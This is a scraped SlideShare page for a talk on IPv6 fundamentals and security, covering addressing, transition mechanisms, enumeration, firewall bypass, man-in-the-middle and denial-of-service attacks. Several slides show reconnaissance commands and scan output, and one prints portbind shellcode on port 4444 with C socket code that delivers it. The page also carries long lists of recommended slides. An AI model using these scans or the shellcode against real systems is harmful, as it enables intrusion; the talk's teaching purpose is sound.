SlideShare ist ein Scribd-Unternehmen logo

IPv6 Fundamentals & Securities

Don Anto
Don Anto
1 von 20
Downloaden Sie, um offline zu lesen
IPv6 Fundamentals & Securities Don Anto IPSECS.COM
Who? • Don Anto • Information security manager • JNCIP-SEC, GSEC, GCIH, GCIA, GPEN, TOGAF • A dead security researcher • Involve in security field for almost 10 years • Genius evil thinker; professional troublemaker • @djantoxz
IPv6 - Why? • Analog to digital convergence (E.G: Voice over IP) • The use of virtualization (E.G: Cloud) • Embedded devices (Smart phone, RFID) networking • All increase the needs of unique IP Address • So, more IP Address spaces are required! • Finally, IPv4 Address Exhaustion
IPv6 - What? • The latest version of Internet Protocol (IP), and is intended to replace IPv4 • 128 bit IP Addressing, instead of 32 bit, to multiply IP address space • IPv4 = 232 (4.294.967.296) >< IPv6 2128 (3.4×1038) • Not using dot decimal anymore, otherwise hexadecimal with colon is used • E.G: • 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092 • 2001:470:0:64::2 • fe80::1
IPv6 Fundamentals Source: Fernando Gont Presentation • IPv6 header, 40 Bytes Fixed Length • Source address 16 bytes, destination address 16 bytes • 8 bytes for version, traffic class, flow label, payload length, next header, & hop limit
IPv6 Fundamentals • IPv6 Address Type: • Loopback • Unspecified • Multicast • Anycast • Local unicast • Global unicast • Subneting • Routing Source: Fernando Gont Presentation
v4 >< v6 Source: Fernando Gont Presentation
v4 to v6 • Dual-Stack system to support IPv4 & IPv6 concurrently • Tunneling mechanism to encapsulate IPv6 inside IPv4 • 6to4, 6in4, Teredo, ISATAP • Network Address Translation (NAT) • Network Address Translation – Protocol Translation (NAT-PT) • Network Address Translation – IPv6 IPv4 (NAT-64) • Free IPv6 Tunnel Broker?
Security Issues • Large space of IPv6 address (enumeration, scanning, managing) • The use of tunneling? The use of dual-stack networking? • Weakness in IPv6 itself? (protocol level vulnerabilities) • Weakness of Application ran on IPv6
Enumeration • Discovery through multicast address (FF02::1) ipv6lab ->./alive6 eth4 • Discovery through ICMPv6 Echo Request Alive: dead:beaf::3 • Discovery through DNS Query (A >< AAAA) Alive: dead:beaf::1 • Discovery through SNMP Query Found 2 systems alive • Google helps us to find IPv6 domains • The presence of IPAM may be help ipv6lab->host -t A www.jp.freebsd.org www.jp.freebsd.org has address 119.245.129.228 ipv6lab->host -t AAAA www.jp.freebsd.org www.jp.freebsd.org has IPv6 address 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092 ipv6lab->ping6 -I eth4 ff02::1 PING ff02::1(ff02::1) from fe80::a00:27ff:fe39:6f0a eth4: 56 data bytes 64 bytes from fe80::a00:27ff:fe39:6f0a: icmp_seq=1 ttl=64 time=0.034 ms 64 bytes from fe80::a00:27ff:fe96:da90: icmp_seq=1 ttl=64 time=1.70 ms (DUP!) 64 bytes from fe80::a00:27ff:fe6c:ea37: icmp_seq=1 ttl=64 time=2.58 ms (DUP!) ipv6lab->ip -6 neigh show fe80::a00:27ff:fe96:da90 dev eth4 lladdr 08:00:27:96:da:90 REACHABLE fe80::a00:27ff:fe6c:ea37 dev eth4 lladdr 08:00:27:6c:ea:37 REACHABLE
ipv6lab->nmap -6 -sV -PN -T4 dead:beaf::3 Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT Interesting ports on dead:beaf::3: Not shown: 999 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9 (protocol 2.0) Scanning ipv6lab->nmap -sV -PN -T4 192.168.137.103 Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT Interesting ports on 192.168.137.103: Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp? 22/tcp open ssh OpenSSH 5.9 (protocol 2.0) MAC Address: 08:00:27:6C:EA:37 (Cadmus Computer Systems) v4 to v6 proxy is usually helpful E.G: Socat apt-get install socat • Port Scanning (Tools with IPv6 support) • Vulnerability Scanning (Tools with IPv6 support)
Perimeter Defense Bypass • Does Firewall protect both IPv4 and IPv6 network? • Does IDS/IPS protect both IPv4 and IPv6 network? • TEREDO tunneling can be used to bypass NAT and to compromise internal network • The use of dual stack and tunneling mandates the protection for IPv4 and IPv6
Perimeter Defense Bypass • IPv4 is well governed by firewall using NAT or policies • Poor firewall configuration is potentially used to bypass access using IPv6 network to DMZ • Even worse, someone may directly access the internal network from internet
Exploiting - Protocols • IPv6 also designed to increase security of IPv4, unfortunately there is no significant improvement • Some problems in IPv4 is still persistent in IPv6 • Man In The Middle Attack • Denial of Services Attack • More and more 
Man In The Middle • Spoofed ICMP Neighbor Advertisement (replacing ARP in v4) • Spoofed ICMP Router Advertisement • Spoofed ICMP Redirect or ICMP Toobig to implant routing • Rogue DHCPv6 Server (replacing DHCP server in v4) • More and more  Source Image: OWASP website Used to help packet sniffing
Denial of Services anto# ifstat -b eth0 • Traffic flooding with ICMPv6 RA, NA, NS, MLD, Smurfing Kbps in Kbps out 9851.48 1.08 • Prevent new IPv6 address with DAD 10244.34 0.95 • CPU Exhaustion with ICMPv6 NS and a lot of crypto stuff 10313.33 0.95 • Routing loop attack utilizes automatic tunneling 9165.56 0.95 • ICMP attack against TCP to tear down BGP session 9358.11 0.95 10165.01 0.95 9802.98 0.95 9353.34 0.95 anto# tcpdump -n -i eth0 dst host dead:beaf::3 20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 4700 packets captured 4884 packets received by filter 93 packets dropped by kernel
Exploiting - Apps char shellcode[] = /*Portbind @ 4444*/ "xd9xccxbdx59x34x55x97xd9x74x24xf4x5ax29xc9" • Buffer Overflow "xb1x17x31x6ax19x83xc2x04x03x6ax15xbbxc1x64" "x4cx68x69xd4x18x84xe4x3bxb6xfexaex76xc7x68" • Remote Format String "xd7xdbx9axc6xbax89x48x80x52x3fx31x2axcbx35" • Off-By-One "xc9x3bxeax20xd5x6axbbx3dx04xcfx29x58x9fx02" • Web App Attacks "x2dx14x79x2fx2ax98x06x1dx61x74x8ex40xc6xc8" • More Attacks?! "xf6x4fx49xbbxaex25x75xe4x9dx39xc0x6dxe6x51" "xfcxa2x65xc9x6ax92xebx60x05x65x08x22x8axfc" • There’s no big difference "x2ex72x27x32x30"; • Socket programming & shellcodes for(AI=AddrInfo;AI!=NULL;AI=AI->ai_next){ if((s=socket(AI->ai_family,AI->ai_socktype,AI->ai_protocol))<0){ v4 to v6 proxy is usually printf("can't create socketn"); exit(0); helpful E.G: Socat } apt-get install socat connect(s,AI->ai_addr,AI->ai_addrlen); send(s,buffer,len,0); printf("Check your shell on %s TCP port 4444n",argv[1]); }
DEMO
Discussion
Thank You

Empfohlen

The Linux Block Layer - Built for Fast Storage
The Linux Block Layer - Built for Fast StorageThe Linux Block Layer - Built for Fast Storage
The Linux Block Layer - Built for Fast StorageKernel TLV
 
イマドキなNetwork/IO
イマドキなNetwork/IOイマドキなNetwork/IO
イマドキなNetwork/IOTakuya ASADA
 
100 M pps on PC.
100 M pps on PC.100 M pps on PC.
100 M pps on PC.Redge Technologies
 
Feature rich BTRFS is Getting Richer with Encryption
Feature rich BTRFS is Getting Richer with EncryptionFeature rich BTRFS is Getting Richer with Encryption
Feature rich BTRFS is Getting Richer with EncryptionLF Events
 
DPDK Summit 2015 - RIFT.io - Tim Mortsolf
DPDK Summit 2015 - RIFT.io - Tim MortsolfDPDK Summit 2015 - RIFT.io - Tim Mortsolf
DPDK Summit 2015 - RIFT.io - Tim MortsolfJim St. Leger
 
File Systems: Why, How and Where
File Systems: Why, How and WhereFile Systems: Why, How and Where
File Systems: Why, How and WhereKernel TLV
 
Trend - HPC-29mai2012
Trend - HPC-29mai2012Trend - HPC-29mai2012
Trend - HPC-29mai2012Agora Group
 
QEMU and Raspberry Pi. Instant Embedded Development
QEMU and Raspberry Pi. Instant Embedded DevelopmentQEMU and Raspberry Pi. Instant Embedded Development
QEMU and Raspberry Pi. Instant Embedded DevelopmentGlobalLogic Ukraine
 

Empfohlen

The Linux Block Layer - Built for Fast Storage
The Linux Block Layer - Built for Fast StorageThe Linux Block Layer - Built for Fast Storage
The Linux Block Layer - Built for Fast StorageKernel TLV
 
イマドキなNetwork/IO
イマドキなNetwork/IOイマドキなNetwork/IO
イマドキなNetwork/IOTakuya ASADA
 
100 M pps on PC.
100 M pps on PC.100 M pps on PC.
100 M pps on PC.Redge Technologies
 
Feature rich BTRFS is Getting Richer with Encryption
Feature rich BTRFS is Getting Richer with EncryptionFeature rich BTRFS is Getting Richer with Encryption
Feature rich BTRFS is Getting Richer with EncryptionLF Events
 
DPDK Summit 2015 - RIFT.io - Tim Mortsolf
DPDK Summit 2015 - RIFT.io - Tim MortsolfDPDK Summit 2015 - RIFT.io - Tim Mortsolf
DPDK Summit 2015 - RIFT.io - Tim MortsolfJim St. Leger
 
File Systems: Why, How and Where
File Systems: Why, How and WhereFile Systems: Why, How and Where
File Systems: Why, How and WhereKernel TLV
 
Trend - HPC-29mai2012
Trend - HPC-29mai2012Trend - HPC-29mai2012
Trend - HPC-29mai2012Agora Group
 
QEMU and Raspberry Pi. Instant Embedded Development
QEMU and Raspberry Pi. Instant Embedded DevelopmentQEMU and Raspberry Pi. Instant Embedded Development
QEMU and Raspberry Pi. Instant Embedded DevelopmentGlobalLogic Ukraine
 
Spy hard, challenges of 100G deep packet inspection on x86 platform
Spy hard, challenges of 100G deep packet inspection on x86 platformSpy hard, challenges of 100G deep packet inspection on x86 platform
Spy hard, challenges of 100G deep packet inspection on x86 platformRedge Technologies
 
Vigor 3910 docker firmware quick start
Vigor 3910 docker firmware quick startVigor 3910 docker firmware quick start
Vigor 3910 docker firmware quick startJimmy Tu
 
Intel DPDK Step by Step instructions
Intel DPDK Step by Step instructionsIntel DPDK Step by Step instructions
Intel DPDK Step by Step instructionsHisaki Ohara
 
Ceph Day Bring Ceph To Enterprise
Ceph Day Bring Ceph To EnterpriseCeph Day Bring Ceph To Enterprise
Ceph Day Bring Ceph To EnterpriseAlex Lau
 
Linux Kernel Live Patching
Linux Kernel Live PatchingLinux Kernel Live Patching
Linux Kernel Live PatchingGlobalLogic Ukraine
 
Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Kernel TLV
 
FreeBSD and Drivers
FreeBSD and DriversFreeBSD and Drivers
FreeBSD and DriversKernel TLV
 
OpenWrt From Top to Bottom
OpenWrt From Top to BottomOpenWrt From Top to Bottom
OpenWrt From Top to BottomKernel TLV
 
Reflections on Trusting Trust
Reflections on Trusting TrustReflections on Trusting Trust
Reflections on Trusting Trustyeokm1
 
Linux Kernel Platform Development: Challenges and Insights
Linux Kernel Platform Development: Challenges and Insights Linux Kernel Platform Development: Challenges and Insights
Linux Kernel Platform Development: Challenges and InsightsGlobalLogic Ukraine
 
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardson
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce RichardsonThe 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardson
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardsonharryvanhaaren
 
DPDK Summit 2015 - NTT - Yoshihiro Nakajima
DPDK Summit 2015 - NTT - Yoshihiro NakajimaDPDK Summit 2015 - NTT - Yoshihiro Nakajima
DPDK Summit 2015 - NTT - Yoshihiro NakajimaJim St. Leger
 
Lagopus presentation on 14th Annual ON*VECTOR International Photonics Workshop
Lagopus presentation on 14th Annual ON*VECTOR International Photonics WorkshopLagopus presentation on 14th Annual ON*VECTOR International Photonics Workshop
Lagopus presentation on 14th Annual ON*VECTOR International Photonics WorkshopLagopus SDN/OpenFlow switch
 
Kernel Recipes 2017 - Build farm again - Willy Tarreau
Kernel Recipes 2017 - Build farm again - Willy TarreauKernel Recipes 2017 - Build farm again - Willy Tarreau
Kernel Recipes 2017 - Build farm again - Willy TarreauAnne Nicolas
 
DPDK In Depth
DPDK In DepthDPDK In Depth
DPDK In DepthKernel TLV
 
LAS16-100K1: Welcome Keynote
LAS16-100K1: Welcome KeynoteLAS16-100K1: Welcome Keynote
LAS16-100K1: Welcome KeynoteLinaro
 
Lec 10-linux-review
Lec 10-linux-reviewLec 10-linux-review
Lec 10-linux-reviewabinaya m
 
DPDK & Layer 4 Packet Processing
DPDK & Layer 4 Packet ProcessingDPDK & Layer 4 Packet Processing
DPDK & Layer 4 Packet ProcessingMichelle Holley
 
QEMU Disk IO Which performs Better: Native or threads?
QEMU Disk IO Which performs Better: Native or threads?QEMU Disk IO Which performs Better: Native or threads?
QEMU Disk IO Which performs Better: Native or threads?Pradeep Kumar
 
RAID, Replication, and You
RAID, Replication, and YouRAID, Replication, and You
RAID, Replication, and YouGreat Wide Open
 
Fred explainsi pv6-v2-alpha
Fred explainsi pv6-v2-alphaFred explainsi pv6-v2-alpha
Fred explainsi pv6-v2-alphaFred Bovy
 
Mobile IPv6 course at CACIC 2006
Mobile IPv6 course at CACIC 2006Mobile IPv6 course at CACIC 2006
Mobile IPv6 course at CACIC 2006Rodolfo Kohn
 

Weitere ähnliche Inhalte

Was ist angesagt?

Spy hard, challenges of 100G deep packet inspection on x86 platform
Spy hard, challenges of 100G deep packet inspection on x86 platformSpy hard, challenges of 100G deep packet inspection on x86 platform
Spy hard, challenges of 100G deep packet inspection on x86 platformRedge Technologies
 
Vigor 3910 docker firmware quick start
Vigor 3910 docker firmware quick startVigor 3910 docker firmware quick start
Vigor 3910 docker firmware quick startJimmy Tu
 
Intel DPDK Step by Step instructions
Intel DPDK Step by Step instructionsIntel DPDK Step by Step instructions
Intel DPDK Step by Step instructionsHisaki Ohara
 
Ceph Day Bring Ceph To Enterprise
Ceph Day Bring Ceph To EnterpriseCeph Day Bring Ceph To Enterprise
Ceph Day Bring Ceph To EnterpriseAlex Lau
 
Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Kernel TLV
 
FreeBSD and Drivers
FreeBSD and DriversFreeBSD and Drivers
FreeBSD and DriversKernel TLV
 
OpenWrt From Top to Bottom
OpenWrt From Top to BottomOpenWrt From Top to Bottom
OpenWrt From Top to BottomKernel TLV
 
Reflections on Trusting Trust
Reflections on Trusting TrustReflections on Trusting Trust
Reflections on Trusting Trustyeokm1
 
Linux Kernel Platform Development: Challenges and Insights
Linux Kernel Platform Development: Challenges and Insights Linux Kernel Platform Development: Challenges and Insights
Linux Kernel Platform Development: Challenges and InsightsGlobalLogic Ukraine
 
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardson
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce RichardsonThe 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardson
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardsonharryvanhaaren
 
DPDK Summit 2015 - NTT - Yoshihiro Nakajima
DPDK Summit 2015 - NTT - Yoshihiro NakajimaDPDK Summit 2015 - NTT - Yoshihiro Nakajima
DPDK Summit 2015 - NTT - Yoshihiro NakajimaJim St. Leger
 
Lagopus presentation on 14th Annual ON*VECTOR International Photonics Workshop
Lagopus presentation on 14th Annual ON*VECTOR International Photonics WorkshopLagopus presentation on 14th Annual ON*VECTOR International Photonics Workshop
Lagopus presentation on 14th Annual ON*VECTOR International Photonics WorkshopLagopus SDN/OpenFlow switch
 
Kernel Recipes 2017 - Build farm again - Willy Tarreau
Kernel Recipes 2017 - Build farm again - Willy TarreauKernel Recipes 2017 - Build farm again - Willy Tarreau
Kernel Recipes 2017 - Build farm again - Willy TarreauAnne Nicolas
 
LAS16-100K1: Welcome Keynote
LAS16-100K1: Welcome KeynoteLAS16-100K1: Welcome Keynote
LAS16-100K1: Welcome KeynoteLinaro
 
Lec 10-linux-review
Lec 10-linux-reviewLec 10-linux-review
Lec 10-linux-reviewabinaya m
 
DPDK & Layer 4 Packet Processing
DPDK & Layer 4 Packet ProcessingDPDK & Layer 4 Packet Processing
DPDK & Layer 4 Packet ProcessingMichelle Holley
 
QEMU Disk IO Which performs Better: Native or threads?
QEMU Disk IO Which performs Better: Native or threads?QEMU Disk IO Which performs Better: Native or threads?
QEMU Disk IO Which performs Better: Native or threads?Pradeep Kumar
 
RAID, Replication, and You
RAID, Replication, and YouRAID, Replication, and You
RAID, Replication, and YouGreat Wide Open
 

Was ist angesagt? (20)

Spy hard, challenges of 100G deep packet inspection on x86 platform
Spy hard, challenges of 100G deep packet inspection on x86 platformSpy hard, challenges of 100G deep packet inspection on x86 platform
Spy hard, challenges of 100G deep packet inspection on x86 platform
 
Vigor 3910 docker firmware quick start
Vigor 3910 docker firmware quick startVigor 3910 docker firmware quick start
Vigor 3910 docker firmware quick start
 
Intel DPDK Step by Step instructions
Intel DPDK Step by Step instructionsIntel DPDK Step by Step instructions
Intel DPDK Step by Step instructions
 
Ceph Day Bring Ceph To Enterprise
Ceph Day Bring Ceph To EnterpriseCeph Day Bring Ceph To Enterprise
Ceph Day Bring Ceph To Enterprise
 
Linux Kernel Live Patching
Linux Kernel Live PatchingLinux Kernel Live Patching
Linux Kernel Live Patching
 
Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545
 
FreeBSD and Drivers
FreeBSD and DriversFreeBSD and Drivers
FreeBSD and Drivers
 
OpenWrt From Top to Bottom
OpenWrt From Top to BottomOpenWrt From Top to Bottom
OpenWrt From Top to Bottom
 
Reflections on Trusting Trust
Reflections on Trusting TrustReflections on Trusting Trust
Reflections on Trusting Trust
 
Linux Kernel Platform Development: Challenges and Insights
Linux Kernel Platform Development: Challenges and Insights Linux Kernel Platform Development: Challenges and Insights
Linux Kernel Platform Development: Challenges and Insights
 
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardson
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce RichardsonThe 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardson
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardson
 
DPDK Summit 2015 - NTT - Yoshihiro Nakajima
DPDK Summit 2015 - NTT - Yoshihiro NakajimaDPDK Summit 2015 - NTT - Yoshihiro Nakajima
DPDK Summit 2015 - NTT - Yoshihiro Nakajima
 
Lagopus presentation on 14th Annual ON*VECTOR International Photonics Workshop
Lagopus presentation on 14th Annual ON*VECTOR International Photonics WorkshopLagopus presentation on 14th Annual ON*VECTOR International Photonics Workshop
Lagopus presentation on 14th Annual ON*VECTOR International Photonics Workshop
 
Kernel Recipes 2017 - Build farm again - Willy Tarreau
Kernel Recipes 2017 - Build farm again - Willy TarreauKernel Recipes 2017 - Build farm again - Willy Tarreau
Kernel Recipes 2017 - Build farm again - Willy Tarreau
 
DPDK In Depth
DPDK In DepthDPDK In Depth
DPDK In Depth
 
LAS16-100K1: Welcome Keynote
LAS16-100K1: Welcome KeynoteLAS16-100K1: Welcome Keynote
LAS16-100K1: Welcome Keynote
 
Lec 10-linux-review
Lec 10-linux-reviewLec 10-linux-review
Lec 10-linux-review
 
DPDK & Layer 4 Packet Processing
DPDK & Layer 4 Packet ProcessingDPDK & Layer 4 Packet Processing
DPDK & Layer 4 Packet Processing
 
QEMU Disk IO Which performs Better: Native or threads?
QEMU Disk IO Which performs Better: Native or threads?QEMU Disk IO Which performs Better: Native or threads?
QEMU Disk IO Which performs Better: Native or threads?
 
RAID, Replication, and You
RAID, Replication, and YouRAID, Replication, and You
RAID, Replication, and You
 

Andere mochten auch

Fred explainsi pv6-v2-alpha
Fred explainsi pv6-v2-alphaFred explainsi pv6-v2-alpha
Fred explainsi pv6-v2-alphaFred Bovy
 
Mobile IPv6 course at CACIC 2006
Mobile IPv6 course at CACIC 2006Mobile IPv6 course at CACIC 2006
Mobile IPv6 course at CACIC 2006Rodolfo Kohn
 
IPV6 addressing plan exercise-1
IPV6 addressing plan exercise-1IPV6 addressing plan exercise-1
IPV6 addressing plan exercise-1stupidbopols
 
IPv4 and IPv6 - addressing Internet infrastructure
IPv4 and IPv6 - addressing Internet infrastructureIPv4 and IPv6 - addressing Internet infrastructure
IPv4 and IPv6 - addressing Internet infrastructureRIPE NCC
 
Addressing plans
Addressing plansAddressing plans
Addressing plansenes373
 
IPv6 Addressing Fundamentals
IPv6 Addressing FundamentalsIPv6 Addressing Fundamentals
IPv6 Addressing FundamentalsRIPE NCC
 
Preparing an IPv6 Addressing Planl
Preparing an IPv6 Addressing PlanlPreparing an IPv6 Addressing Planl
Preparing an IPv6 Addressing PlanlDave Thyssen
 
IPv6 Addressing Plans and Subnetting
IPv6 Addressing Plans and SubnettingIPv6 Addressing Plans and Subnetting
IPv6 Addressing Plans and SubnettingRIPE NCC
 
IPv6 Addressing Plan Fundamentals
IPv6 Addressing Plan FundamentalsIPv6 Addressing Plan Fundamentals
IPv6 Addressing Plan FundamentalsRIPE NCC
 
instructor ppt_chapter8.2.2 - i_pv6 addressing with exercises of IPv6
instructor ppt_chapter8.2.2 - i_pv6 addressing with exercises of IPv6instructor ppt_chapter8.2.2 - i_pv6 addressing with exercises of IPv6
instructor ppt_chapter8.2.2 - i_pv6 addressing with exercises of IPv6cyberjoex
 
IPV6 Addressing
IPV6 Addressing IPV6 Addressing
IPV6 Addressing Heba_a
 
Internet Protocol Version 6
Internet Protocol Version 6Internet Protocol Version 6
Internet Protocol Version 6sandeepjain
 
IPv6 networking training sduffy v3
IPv6 networking training sduffy v3IPv6 networking training sduffy v3
IPv6 networking training sduffy v3Shane Duffy
 
Lesson 3: IPv6 Fundamentals
Lesson 3: IPv6 FundamentalsLesson 3: IPv6 Fundamentals
Lesson 3: IPv6 FundamentalsMahmmoud Mahdi
 
Networking - TCP/IP stack introduction and IPv6
Networking - TCP/IP stack introduction and IPv6Networking - TCP/IP stack introduction and IPv6
Networking - TCP/IP stack introduction and IPv6Rodolfo Kohn
 
Addressing IPv6
Addressing IPv6Addressing IPv6
Addressing IPv6Fastly
 
IPv6 Fundamentals
IPv6 FundamentalsIPv6 Fundamentals
IPv6 FundamentalsMatt Bynum
 

Andere mochten auch (20)

Fred explainsi pv6-v2-alpha
Fred explainsi pv6-v2-alphaFred explainsi pv6-v2-alpha
Fred explainsi pv6-v2-alpha
 
Mobile IPv6 course at CACIC 2006
Mobile IPv6 course at CACIC 2006Mobile IPv6 course at CACIC 2006
Mobile IPv6 course at CACIC 2006
 
IPV6 addressing plan exercise-1
IPV6 addressing plan exercise-1IPV6 addressing plan exercise-1
IPV6 addressing plan exercise-1
 
IPv4 and IPv6 - addressing Internet infrastructure
IPv4 and IPv6 - addressing Internet infrastructureIPv4 and IPv6 - addressing Internet infrastructure
IPv4 and IPv6 - addressing Internet infrastructure
 
Addressing plans
Addressing plansAddressing plans
Addressing plans
 
IPv6 Addressing Fundamentals
IPv6 Addressing FundamentalsIPv6 Addressing Fundamentals
IPv6 Addressing Fundamentals
 
Preparing an IPv6 Addressing Planl
Preparing an IPv6 Addressing PlanlPreparing an IPv6 Addressing Planl
Preparing an IPv6 Addressing Planl
 
IPv6 Addressing Plans and Subnetting
IPv6 Addressing Plans and SubnettingIPv6 Addressing Plans and Subnetting
IPv6 Addressing Plans and Subnetting
 
IPv6 Addressing Plan Fundamentals
IPv6 Addressing Plan FundamentalsIPv6 Addressing Plan Fundamentals
IPv6 Addressing Plan Fundamentals
 
I pv6 for cmu
I pv6 for cmuI pv6 for cmu
I pv6 for cmu
 
instructor ppt_chapter8.2.2 - i_pv6 addressing with exercises of IPv6
instructor ppt_chapter8.2.2 - i_pv6 addressing with exercises of IPv6instructor ppt_chapter8.2.2 - i_pv6 addressing with exercises of IPv6
instructor ppt_chapter8.2.2 - i_pv6 addressing with exercises of IPv6
 
IPv6 Address Planning
IPv6 Address PlanningIPv6 Address Planning
IPv6 Address Planning
 
IPV6 Addressing
IPV6 Addressing IPV6 Addressing
IPV6 Addressing
 
Internet Protocol Version 6
Internet Protocol Version 6Internet Protocol Version 6
Internet Protocol Version 6
 
IPv6 networking training sduffy v3
IPv6 networking training sduffy v3IPv6 networking training sduffy v3
IPv6 networking training sduffy v3
 
Lesson 3: IPv6 Fundamentals
Lesson 3: IPv6 FundamentalsLesson 3: IPv6 Fundamentals
Lesson 3: IPv6 Fundamentals
 
Networking - TCP/IP stack introduction and IPv6
Networking - TCP/IP stack introduction and IPv6Networking - TCP/IP stack introduction and IPv6
Networking - TCP/IP stack introduction and IPv6
 
Addressing IPv6
Addressing IPv6Addressing IPv6
Addressing IPv6
 
IPv6 theoryfinalx
IPv6 theoryfinalxIPv6 theoryfinalx
IPv6 theoryfinalx
 
IPv6 Fundamentals
IPv6 FundamentalsIPv6 Fundamentals
IPv6 Fundamentals
 

Ähnlich wie IPv6 Fundamentals & Securities

IPv6 Security - Hacker Halted 2013
IPv6 Security - Hacker Halted 2013IPv6 Security - Hacker Halted 2013
IPv6 Security - Hacker Halted 2013Zivaro Inc
 
How You Will Get Hacked Ten Years from Now
How You Will Get Hacked Ten Years from NowHow You Will Get Hacked Ten Years from Now
How You Will Get Hacked Ten Years from Nowjulievreeland
 
Getting started with IPv6
Getting started with IPv6Getting started with IPv6
Getting started with IPv6Private
 
Implementing an IPv6 Enabled Environment for a Public Cloud Tenant
Implementing an IPv6 Enabled Environment for a Public Cloud TenantImplementing an IPv6 Enabled Environment for a Public Cloud Tenant
Implementing an IPv6 Enabled Environment for a Public Cloud TenantShixiong Shang
 
AutoIP -A mechanism for IPv6 migration and IPv4 sunsetting by Shishio Tsuchiy...
AutoIP -A mechanism for IPv6 migration and IPv4 sunsetting by Shishio Tsuchiy...AutoIP -A mechanism for IPv6 migration and IPv4 sunsetting by Shishio Tsuchiy...
AutoIP -A mechanism for IPv6 migration and IPv4 sunsetting by Shishio Tsuchiy...APNIC
 
The End of IPv4: What It Means for Incident Responders
The End of IPv4: What It Means for Incident RespondersThe End of IPv4: What It Means for Incident Responders
The End of IPv4: What It Means for Incident RespondersCarlos Martinez Cagnazzo
 
dokumen.tips_linux-networking-commands.ppt
dokumen.tips_linux-networking-commands.pptdokumen.tips_linux-networking-commands.ppt
dokumen.tips_linux-networking-commands.pptThorOdinson55
 
IPv6 The Big Move
IPv6 The Big MoveIPv6 The Big Move
IPv6 The Big Movefrenildand
 
fgont-h2hc-2020-ipv6-security.pdf
fgont-h2hc-2020-ipv6-security.pdffgont-h2hc-2020-ipv6-security.pdf
fgont-h2hc-2020-ipv6-security.pdfFernandoGont
 
NAT 64 FPGA Implementation
NAT 64 FPGA ImplementationNAT 64 FPGA Implementation
NAT 64 FPGA ImplementationJanith Rukman
 
v6_whats-happening (presentation at GEANT APM meeting, 2011, Ljubljana)
v6_whats-happening (presentation at GEANT APM meeting, 2011, Ljubljana)v6_whats-happening (presentation at GEANT APM meeting, 2011, Ljubljana)
v6_whats-happening (presentation at GEANT APM meeting, 2011, Ljubljana)matjazsi
 
Multi-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation StrategiesMulti-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation StrategiesSagi Brody
 
4. IPv6 Security - Workshop mit Live Demo - Marco Senn Fortinet
4. IPv6 Security - Workshop mit Live Demo - Marco Senn Fortinet4. IPv6 Security - Workshop mit Live Demo - Marco Senn Fortinet
4. IPv6 Security - Workshop mit Live Demo - Marco Senn FortinetDigicomp Academy AG
 
IPv6 Security - Workshop mit Live Demo
IPv6 Security - Workshop mit Live DemoIPv6 Security - Workshop mit Live Demo
IPv6 Security - Workshop mit Live DemoDigicomp Academy AG
 
The Next Generation Firewall for Red Hat Enterprise Linux 7 RC
The Next Generation Firewall for Red Hat Enterprise Linux 7 RCThe Next Generation Firewall for Red Hat Enterprise Linux 7 RC
The Next Generation Firewall for Red Hat Enterprise Linux 7 RCThomas Graf
 

Ähnlich wie IPv6 Fundamentals & Securities (20)

IPv6 Security - Hacker Halted 2013
IPv6 Security - Hacker Halted 2013IPv6 Security - Hacker Halted 2013
IPv6 Security - Hacker Halted 2013
 
How You Will Get Hacked Ten Years from Now
How You Will Get Hacked Ten Years from NowHow You Will Get Hacked Ten Years from Now
How You Will Get Hacked Ten Years from Now
 
9 ipv6-routing
9 ipv6-routing9 ipv6-routing
9 ipv6-routing
 
Day 20.i pv6 lab
Day 20.i pv6 labDay 20.i pv6 lab
Day 20.i pv6 lab
 
Getting started with IPv6
Getting started with IPv6Getting started with IPv6
Getting started with IPv6
 
IPv6
IPv6IPv6
IPv6
 
Implementing an IPv6 Enabled Environment for a Public Cloud Tenant
Implementing an IPv6 Enabled Environment for a Public Cloud TenantImplementing an IPv6 Enabled Environment for a Public Cloud Tenant
Implementing an IPv6 Enabled Environment for a Public Cloud Tenant
 
Ipv6
Ipv6Ipv6
Ipv6
 
AutoIP -A mechanism for IPv6 migration and IPv4 sunsetting by Shishio Tsuchiy...
AutoIP -A mechanism for IPv6 migration and IPv4 sunsetting by Shishio Tsuchiy...AutoIP -A mechanism for IPv6 migration and IPv4 sunsetting by Shishio Tsuchiy...
AutoIP -A mechanism for IPv6 migration and IPv4 sunsetting by Shishio Tsuchiy...
 
The End of IPv4: What It Means for Incident Responders
